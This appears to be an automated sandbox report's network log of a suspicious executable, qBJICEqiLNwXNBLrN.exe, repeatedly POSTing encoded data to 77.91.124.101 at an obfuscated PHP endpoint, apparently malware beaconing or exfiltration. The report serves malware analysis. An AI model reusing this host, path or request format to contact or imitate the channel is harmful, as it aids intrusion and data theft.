                                                            Data Ascii: R\X_^^ZQ]WUWUWWZP\XEVRWY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$==+8&V=(;'*75?509& :-(</\8.&G''^)
                                                            Nov 21, 2023 04:47:49.643173933 CET274INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:49 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            3477.91.124.10180192.168.2.549747C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:49.956535101 CET275OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:47:50.159806013 CET275INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:50.160186052 CET278OUTData Raw: 57 58 58 5d 5b 59 5a 50 5d 57 55 57 55 58 57 54 50 5b 58 48 56 57 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WXX][YZP]WUWUXWTP[XHVWWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_)+5+]2W=3[/7&Z :><0>'.S0>R.;*]+?7\/>&G''^)?
                                                            Nov 21, 2023 04:47:50.364954948 CET278INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:50 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            34192.168.2.54974777.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:49.956535101 CET275OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:47:50.159806013 CET275INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:50.160186052 CET278OUTData Raw: 57 58 58 5d 5b 59 5a 50 5d 57 55 57 55 58 57 54 50 5b 58 48 56 57 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WXX][YZP]WUWUXWTP[XHVWWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_)+5+]2W=3[/7&Z :><0>'.S0>R.;*]+?7\/>&G''^)?
                                                            Nov 21, 2023 04:47:50.364954948 CET278INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:50 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            35192.168.2.54974977.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:50.690767050 CET279OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:50.889306068 CET279INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:50.889525890 CET282OUTData Raw: 52 5d 58 5a 5e 5d 5f 5d 5d 57 55 57 55 5c 57 57 50 5f 58 41 56 50 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R]XZ^]_]]WUWU\WWP_XAVPW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)85X+))86 :+&3=!$ =-+<X8>&G''^)/
                                                            Nov 21, 2023 04:47:51.094454050 CET287INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:50 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            3577.91.124.10180192.168.2.549749C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:50.690767050 CET279OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:50.889306068 CET279INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:50.889525890 CET282OUTData Raw: 52 5d 58 5a 5e 5d 5f 5d 5d 57 55 57 55 5c 57 57 50 5f 58 41 56 50 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R]XZ^]_]]WUWU\WWP_XAVPW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)85X+))86 :+&3=!$ =-+<X8>&G''^)/
                                                            Nov 21, 2023 04:47:51.094454050 CET287INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:50 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            36192.168.2.54975077.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:51.409622908 CET287OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:51.606362104 CET314INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:51.606614113 CET317OUTData Raw: 57 5f 5d 5e 5e 58 5a 59 5d 57 55 57 55 5e 57 52 50 5e 58 46 56 55 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W_]^^XZY]WUWU^WRP^XFVUW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'^)(Y?**37\,%7*9+-&-$2V:)?? ,&G''^)#
                                                            Nov 21, 2023 04:47:51.809705973 CET317INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:51 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            3677.91.124.10180192.168.2.549750C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:51.409622908 CET287OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:51.606362104 CET314INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:51.606614113 CET317OUTData Raw: 57 5f 5d 5e 5e 58 5a 59 5d 57 55 57 55 5e 57 52 50 5e 58 46 56 55 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W_]^^XZY]WUWU^WRP^XFVUW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'^)(Y?**37\,%7*9+-&-$2V:)?? ,&G''^)#
                                                            Nov 21, 2023 04:47:51.809705973 CET317INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:51 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            37192.168.2.54975177.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:52.133124113 CET318OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:52.332041979 CET318INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:52.334084988 CET321OUTData Raw: 52 5a 58 5c 5b 52 5f 5c 5d 57 55 57 55 56 57 52 50 53 58 41 56 52 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RZX\[R_\]WUWUVWRPSXAVRWY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X*([(;>0;\/$&7*1_?&S0>>30,;!+7,>&G''^)
                                                            Nov 21, 2023 04:47:52.540139914 CET321INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:52 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            3777.91.124.10180192.168.2.549751C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:52.133124113 CET318OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:52.332041979 CET318INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:52.334084988 CET321OUTData Raw: 52 5a 58 5c 5b 52 5f 5c 5d 57 55 57 55 56 57 52 50 53 58 41 56 52 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RZX\[R_\]WUWUVWRPSXAVRWY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X*([(;>0;\/$&7*1_?&S0>>30,;!+7,>&G''^)
                                                            Nov 21, 2023 04:47:52.540139914 CET321INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:52 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            38192.168.2.54975277.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:52.878020048 CET322OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:53.074857950 CET322INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:53.075289011 CET325OUTData Raw: 52 58 5d 59 5e 59 5a 59 5d 57 55 57 55 5a 57 5b 50 5d 58 49 56 51 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RX]Y^YZY]WUWUZW[P]XIVQWY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_)5?:T></-76+#!'.-&0W.+<,8-.&G''^)7
                                                            Nov 21, 2023 04:47:53.278687954 CET325INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:52 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            3877.91.124.10180192.168.2.549752C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:52.878020048 CET322OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:53.074857950 CET322INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:53.075289011 CET325OUTData Raw: 52 58 5d 59 5e 59 5a 59 5d 57 55 57 55 5a 57 5b 50 5d 58 49 56 51 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RX]Y^YZY]WUWUZW[P]XIVQWY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_)5?:T></-76+#!'.-&0W.+<,8-.&G''^)7
                                                            Nov 21, 2023 04:47:53.278687954 CET325INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:52 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            3977.91.124.10180192.168.2.549753C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:53.596347094 CET326OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:53.794019938 CET326INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:53.794276953 CET328OUTData Raw: 57 5e 58 51 5b 5b 5a 59 5d 57 55 57 55 5a 57 5b 50 5e 58 48 56 5f 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W^XQ[[ZY]WUWUZW[P^XHV_W]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*>(? 4,*\79>?"Q0>>V0-89+, /&G''^)7
                                                            Nov 21, 2023 04:47:53.998054028 CET329INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:53 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            39192.168.2.54975377.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:53.596347094 CET326OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:53.794019938 CET326INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:53.794276953 CET328OUTData Raw: 57 5e 58 51 5b 5b 5a 59 5d 57 55 57 55 5a 57 5b 50 5e 58 48 56 5f 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W^XQ[[ZY]WUWUZW[P^XHV_W]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*>(? 4,*\79>?"Q0>>V0-89+, /&G''^)7
                                                            Nov 21, 2023 04:47:53.998054028 CET329INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:53 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            4192.168.2.54971677.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:28.852116108 CET158OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:29.050067902 CET159INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:29.050301075 CET161OUTData Raw: 57 5b 5d 5a 5e 5d 5a 5d 5d 57 55 57 55 59 57 55 50 5f 58 44 56 57 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W[]Z^]Z]]WUWUYWUP_XDVWW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'+8)Y?*348% 6)#.S$."V&#%:;(/_8>&G''^)
                                                            Nov 21, 2023 04:47:29.257055044 CET162INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:28 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            477.91.124.10180192.168.2.549716C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
